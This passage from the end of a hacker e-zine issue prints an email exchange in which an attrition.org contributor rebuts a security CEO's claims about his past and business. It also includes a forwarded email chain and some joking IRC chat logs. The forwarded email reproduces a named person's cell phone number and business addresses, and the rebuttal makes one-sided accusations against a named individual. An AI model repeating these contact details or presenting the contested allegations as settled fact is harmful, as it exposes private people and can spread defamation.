2813. a very high turnover rate. His claims of consultants in other countries
2814. make this basically impossible to verify, especially since he has not
2815. published financials for 2010 as required by the SEC.
2816.  
2817. : The term "number 1 hacker" came from Mr. Morris, the FBI agent that
2818. : arrested Evans, who described Evans as on the "top 10 list of number 1
2819. : hackers."
2820.  
2821. This is a new claim (re: Morris), but based on my experience with the FBI
2822. seems absurd. Evans was convicted of toll fraud, not really 'hacking'. At
2823. that time, the FBI had seen some pretty high end / impressive hacking, and
2824. what Evans was doing didn't come close.
2825.  
2826. : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and
2827. : a $4 million house.
2828.  
2829. None of this can be verified so far, and we've tried. Given the apartments
2830. he has lived in for the last 2 years, as verified by ex employees, it is
2831. unlikely he has had any significant money to do this. Based on court
2832. records we have published, he likely has never actually had 1 million
2833. dollars, just serious debt, including the ~ 10 million he still owes. Even
2834. now, he owes serious money not only for the previous crimes, but as a
2835. result of his business dealings the last few years. We have some of the
2836. records:
2837.  
2838. http://attrition.org/errata/charlatan/gregory_evans/ligatt15/
2839.  
2840. A summary of his debt:
2841.  
2842. http://attrition.org/errata/charlatan/gregory_evans/evans21.html
2843.  
2844. : Evans's book "Laptop Security" sold 150,000 copies.
2845.  
2846. We have not heard this claim. However, search Amazon for that title and
2847. look how many are available new/used, and it is likely false. It's curious
2848. he is focusing on that book, as all of his previous claims centered around
2849. the 'No 1 Hacker' book.
2850.  
2851. : The material found online in Evans's "No. 1 Hacker" book was not
2852. : copyrighted and therefore was not legally forbidden to use.
2853.  
2854. This is patently false. The material he found online *was* copyrighted,
2855. even if the work did not explicitly say it was. This is copyright 101.
2856. There is currently a group of the authors that are still considering
2857. taking action against him. I have personally read mails from half a dozen
2858. of these authors that confirm they hold the copyright, and that they did
2859. NOT give him permsission or sell it to him (as he claimed in other
2860. sources). A mail to Simple Nomad of NMRC will confirm this as one of the
2861. authors (who will reply and confirm, while others will not due to
2862. potential legal action).
2863.  
2864. : Evans was contracted to set up a CCTV camera network at a county prison
2865. : while on probation.
2866.  
2867. Never heard this claim, but given how prisons work (and two direct family
2868. members that worked in that system), this is very dubious.
2869.  
2870. : Evans has committed "every type of high-tech crime you can ever think of
2871. : before [he] was 26-years-old."
2872.  
2873. Again, his conviction was for basic toll fraud. This doesn't suggest any
2874. level of skill that would back this claim.
2875.  
2876. : In 1998, Evans was interrogated by the authorities regarding a
2877. : system-wide crash of the SkyTel pager network.
2878.  
2879. No way to verify this short of a FOIA request for that case. I have not
2880. heard this claim before.
2881.  
2882. : Every time Evans was caught by the authorities, it was because someone
2883. : else snitched on him.
2884.  
2885. The current court records do not suggest this. They do suggest that Evans
2886. was a snitch (see Mitnick's presentation last year about the topic). We
2887. have the docket for his big case online, and there is no mention of a
2888. snitch.
2889.  
2890. http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf
2891.  
2892. http://attrition.org/errata/charlatan/gregory_evans/ligatt07/
2893.  
2894. : "High-tech grand theft" is a new state crime that was formed
2895. : specifically because of Evans's actions.
2896.  
2897. There is no state law that uses those words I bet =) Did he mean Georgia?
2898. How 'new'? This would be easy to verify unless he further spins the claim.
2899.  
2900. : There are plenty more points, but there's just too much stuff to listen
2901. : to. It's not too bad of a list, anyways.
2902.  
2903. As usual, and it isn't just Evans, these types of claims are almost always
2904. made without any real detail, no verification from HIM, etc.
2905. Unfortunately, a lot of these are new claims or have new elements we
2906. haven't seen.
2907.  
2908. : I have also attached an email that Evans forwarded to me that may be of
2909. : interest to you. Thank you again for your time, and I look forward to
2910. : your response to these claims.
2911.  
2912. Yep, np! If you want to run any other claims by me, feel free. I will be
2913. offline for about 24 hours starting Thursday as I fly back to the states.
2914.  
2915. As for the e-mail, I have read it before actually via Don. It was not
2916. published on attrition.org because it is irrelevant to Evans' claims.
2917. Because he offered to buy a web site, doesn't mean any deal was made
2918. regarding publishing material written by Don. It does not speak to any
2919. agreement, purchase or transfer of copyright of text included in Evans
2920. book. So yes, it wasn't included on our site =) As always, showing one
2921. thing that is marginally related to a piece of another story isn't proof,
2922. but it is an essential tool in a con.
2923.  
2924. - jericho
2925.  
2926. The attached email mentioned above can be read here. Evans forwarded this to us after the interview:
2927.  
2928. Sorry we got disconnected. Here is proof that I sent Donald an email asking to buy his website
2929. 6 months before hand. Proving that there was no malicious intent. This is the stuff that they
2930. did not put on Attrition.org. Also if you want to finish up just let me no.
2931.  
2932. Begin forwarded message:
2933.  
2934. > From: "EH-Net-Don" <don@ethicalhacker.net>
2935. > Date: December 17, 2009 12:15:13 PM EST
2936. > To: "'Gregory Evans'" <gregoryevans@ligatt.com>
2937. > Subject: [SPAM] RE: Purchase of Ethical Hacker Network
2938. > Reply-To: <don@ethicalhacker.net>
2939. >
2940. > Hey Gregory,
2941. >
2942. > Thank you very much for your kind words. It’s never a bad thing to have your blood, sweat and
2943. > tears get recognized in a positive way. Although I’m not sure selling is my desire at the
2944. > moment, I’m always willing to talk business and make new friends in the industry. Either way,
2945. > you might be interested in getting the word out about your company and its products and
2946. > services to a wider ethical hacking community. Maybe we could also chat about advertising on
2947. > my site and/or supporting my ethical hacking conference, ChicagoCon. How’s that for a reverse
2948. > pitch? ;-)
2949. >
2950. > If you don’t mind me asking, how did you find out about us?
2951. >
2952. > Looking forward,
2953. > Don
2954. >
2955. > PS – There’s a typo in you LA address. Guess I can’t stop being an editor. J
2956. > Donald C. Donzal, CISSP, MCSE 2003, CEH, Security+ SME
2957. > The Digital Construction Company
2958. > 1520 Heidorn Ave.
2959. > Westchester, IL 60154
2960. > 708.837.3002 (Cell)
2961. > Founder & Organizer
2962. > ChicagoCon
2963. > Editor-In-Chief
2964. > The Ethical Hacker Network
2965. >
2966. >
2967. >
2968. > From: Gregory Evans [mailto:gregoryevans@ligatt.com]
2969. > Sent: Wednesday, December 16, 2009 11:38 PM
2970. > To: don@ethicalhacker.net
2971. > Subject: Purchase of Ethical Hacker Network
2972. >
2973. > Hello Donzal,
2974. >
2975. > My name is Gregory Evans the CEO of LIGATT Security International (www.ligatt.com). I am very
2976. > impressed with your website Ethical Hacker Network. I would love to speak to you sometime
2977. > about purchasing the website and still having you run the site. If you are interested please
2978. > feel to contact me at 866-354-4288 Ext. 5673.
2979. >
2980. > Have a Blessed Day,
2981. >
2982. > Gregory Evans
2983. > President / CEO
2984. >
2985. > 866-354-4288 Ext. 5673
2986. >
2987. > Atlanta:
2988. > 6050 Peachtree Parkway
2989. > Suite 200
2990. > Norcross, Ga 30092
2991. >
2992. > Los Angeles:
2993. > 11209 Naitonal Blvd.
2994. > Suite 178
2995. > Los Angeles, Ca 90292
2996. >
2997.  
2998.  
2999. Have a Blessed Day,
3000.  
3001. Gregory Evans
3002. President / CEO
3003.  
3004. Ring: 866-354-4288 Ext. 5673
3005. Look: www.LIGATT.COM
3006. Follow: www.twitter.com/ligatt
3007. Post: www.facebook.com/GregoryDEvans
3008.  
3009. Atlanta
3010. 6050 Peachtree Parkway
3011. Suite 200
3012. Norcross, Ga 30092
3013.  
3014. As if there wasn't enough drama already, on February 2, a message was broadcasted to the Full-
3015. Disclosure mailing list detailing the compromise of Evans' websites and email accounts, leaking
3016. hordes of personal and confidential information. We, personally, have taken little time to look
3017. through the leak and aren't able to better confirm or deny any claims made by Evans. There is most
3018. likely much to learn, though, according to Jericho:
3019.  
3020. : Thank you very much for providing insight on these claims. Would it be
3021. : okay to publish this email in the zine? I think it would be interesting
3022. : to place this side-by-side with the interview.
3023.  
3024. Yep, feel free. Also note, that with recent events (Evans' entire mail
3025. spool being leaked / published), some of these claims may be more
3026. thoroughly debunked in the coming weeks. As an example, his mail spool
3027. shows that he did register thecyberwars.com despite repeated claims he had
3028. nothing to do with it.
3029.  
3030. : > : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and
3031. : > : a $4 million house.
3032. : >
3033. : > None of this can be verified so far, and we've tried. Given the apartments
3034. : > he has lived in for the last 2 years, as verified by ex employees, it is
3035.  
3036. A recent mail leaked from his spool shows that he could not even rent an
3037. apartment under his mom's name after they performed due diligence. When
3038. confronted with it, Evans libels attrition:
3039.  
3040. http://pastebin.com/J4JeG2W8
3041.  
3042. : > A summary of his debt:
3043. : >
3044. : > http://attrition.org/errata/charlatan/gregory_evans/evans21.html
3045.  
3046. Updated with another entry since this mail.
3047.  
3048. Also,
3049.  
3050. : Additionally, I found these the other day; you may also find them wildly
3051. : amusing:
3052. :
3053. : http://www.theregister.co.uk/2011/01/31/ligatt_security_subpoena_quashed/
3054.  
3055. Already posted on the charlatan page.
3056.  
3057. : http://www.escapistmagazine.com/news/view/107413-Computer-Hackers-Getting-Their-Own-Reality-Show
3058.  
3059. He claims his life story was bought for a movie, that never materialized.
3060. As I tweeted the other day:
3061.  
3062. Hey @GregoryDEvans or @LIGATT .. any comment on why the last movie deal
3063. went nowhere? http://in.sys-con.com/node/927014
3064.  
3065. If he did get a reality show, why doesn't he name the network / company
3066. that bought it?
3067.  
3068. And,
3069.  
3070. : ?I have to be modest and say that we at LIGATT could not have been able
3071. : to do this without the help of Chris John Riley, Kris French, Sam Bowne,
3072. : Elizabeth Summers, Atrrion.org, Crabbybastard.com and all the other
3073. : people who kept our name relevant. What sealed the deal for us and got
3074. : the networks to say, ?lets do it? was ?LIGATTleaks?. Again, I have shown
3075. : that what people may say about you or try to do to you does not stand in
3076. : the way of my success. Success it the best revenge,? says Evans.
3077. :
3078. : Thought that was funny.
3079.  
3080. Yep, that is his new strategy for the last few weeks, he said the same
3081. thing in one of his recent video blogs as well.
3082.  
3083. -=-=-
3084.  
3085. If you would like to weigh in on the interview, the LIGATT controversy, or anything related to
3086. LIGATT, Gregory D. Evans, or the leak, our contact information is in the introduction - we will
3087. publish intelligent arguments and opinions (both for and against) in the next issue.
3088.  
3089. [==================================================================================================]
3090.  
3091. -=[ 0x0e Et Cetera, Etc.
3092. -=[ Author: teh crew
3093.  
3094.  
3095. In the absence of any real miscellaneous content, why not take a look at some of the shenanigans
3096. that go on in the good 'ol #gny.
3097.  
3098.  
3099. We're competent! We promise!
3100. ----------------------------------------------------------------------------------------------------
3101.  
3102. [16:22] <GNY'oliverjhudson93> It is expected on February 3rd, 2011, that there will be a formal
3103. announcement in the US that IPv4 addresses have been completely exhausted
3104. [16:23] <GNY'connection> yes
3105. [16:23] <GNY'connection> but they finished today
3106. [16:23] <GNY'oliverjhudson93> who got the last one?
3107. [16:23] <GNY'connection> fucked if i know
3108. [16:23] <GNY'oliverjhudson93> was it 999.999.999.999
3109. [16:23] <GNY'connection> but I would sell it
3110. [16:23] <GNY'connection> oliverjhudson93, I hope you are trolling
3111. [16:23] <GNY'connection> cause otherwise
3112. [16:23] <GNY'connection> that was the most retarded thing
3113. [16:23] <GNY'connection> I have ever heard
3114. [16:23] <GNY'oliverjhudson93> nah i'm pulling your leg :P
3115. [16:23] <GNY'connection> good
3116. [16:23] <GNY'oliverjhudson93> (im joking)
3117. [16:24] <Silks> cough liar
3118. [16:24] <GNY'connection> you are joking about lying?
3119. [16:24] <GNY'oliverjhudson93> i'm joking about joking?
3120. [16:24] <GNY'oliverjhudson93> I don't know anymore
3121. [16:24] <GNY'oliverjhudson93> I'm gonna DDoS 127.0.0.1 D:
3122. [16:25] <GNY'connection> oliverjhudson93, what is the highest IP someone could have?
3123. [16:25] <GNY'connection> not even taking into account the limits set in place for broadcasts blah
3124. blah blah
3125. [16:25] <GNY'connection> straight up, highest IP address
3126. [16:25] <GNY'oliverjhudson93> 255
3127. [16:26] <GNY'oliverjhudson93> I don't actually know
3128. [16:26] <GNY'oliverjhudson93> but i figure
3129. [16:26] <GNY'oliverjhudson93> 255.255.255.255?
3130. [16:26] <GNY'oliverjhudson93> but thats like
3131. [16:26] <GNY'oliverjhudson93> subnet mask or some shit that I don't understand
3132. [16:26] <GNY'connection> technically it's 256.256.256.256
3133. [16:26] <GNY'connection> but as we have limits imposed
3134. [16:26] <GNY'connection> yes
3135. [16:26] <GNY'connection> 255.255.255.255
3136. [16:26] <GNY'oliverjhudson93> See I dun goof'd!
3137. [16:27] <Silks> urr no
3138. [16:27] <Silks> it is 0-255
3139. [16:27] <GNY'connection> yea I fubar'd
3140. [16:27] <Silks> because that is the range of values you can store in an 8bit number
3141. [16:27] <GNY'connection> you don't know
3142. [16:27] <GNY'connection> how hard
3143. [16:27] <GNY'connection> I headdesked
3144. [16:27] <GNY'connection> after I typed that
3145. [16:27] <GNY'oliverjhudson93> :P
3146. [16:27] <Silks> I am embarrassed for you
3147. [16:27] <GNY'connection> and was hoping no one would catch it
3148.  
3149.  
3150. A shitty situation
3151. ----------------------------------------------------------------------------------------------------
3152.  
3153. [21:58] <&elchupathingy> storm would you be pissed if i took a shit on your porch?
3154. [22:05] <~Silks> what if I were to?
3155. [22:06] <&storm> i would be curious to see that since i don't have a porch
3156. [22:06] <~Silks> what do you have that I could shit on?
3157. [22:07] <&storm> the dorm building has a stoop, i guess
3158. [22:07] <&storm> well, not really actually
3159. [22:08] <~Silks> what about siblings?
3160. [22:08] <~Silks> do you have a sister?
3161. [22:08] <&storm> i'm an only child
3162. [22:08] <&storm> :(
3163. [22:08] <~Silks> ditto
3164. [22:08] <~Silks> however that means you have a lot of stuff
3165. [22:08] <~Silks> and therefore a lot of things to be fouled
3166. [22:09] <&storm> this is very true
3167. [22:10] <&elchupathingy> what if
3168. [22:10] <&elchupathingy> we built a porch
3169. [22:10] <&elchupathingy> then shit on it
3170. [22:10] <&storm> i like your thinking
3171.  
3172.  
3173. GTFO emo storm
3174. ----------------------------------------------------------------------------------------------------
3175.  
3176. [01:12] <storm> sometimes i message myself to check if i'm still connected
3177. [01:13] <elchupathingy> that sounds depressing as hell
3178.  
3179.  
3180. We could go on, but that would only embarrass us more. And everyone knows the first rule to being a
3181. sooper l33t h4xx0r klan is to only portray yourselves as FUCKING HARDCORE MOTHERFUCKERS.
3182.  
3183. Yeah, whatever.
3184.  
3185. So, yeah. Looks like the end of issue #4 - hope you liked it. Like always, if you'd like to submit
3186. content for future issues, our contact information is in the introduction. The call for papers for
3187. issue #5 is now open, so get your crap in.
3188.  
3189. See you in the summer.
3190.  
3191. <3, the gny crew
3192.  
3193. irc.gonullyourself.org +6697 #gny
3194.  
3195.  
3196. [==================================================================================================]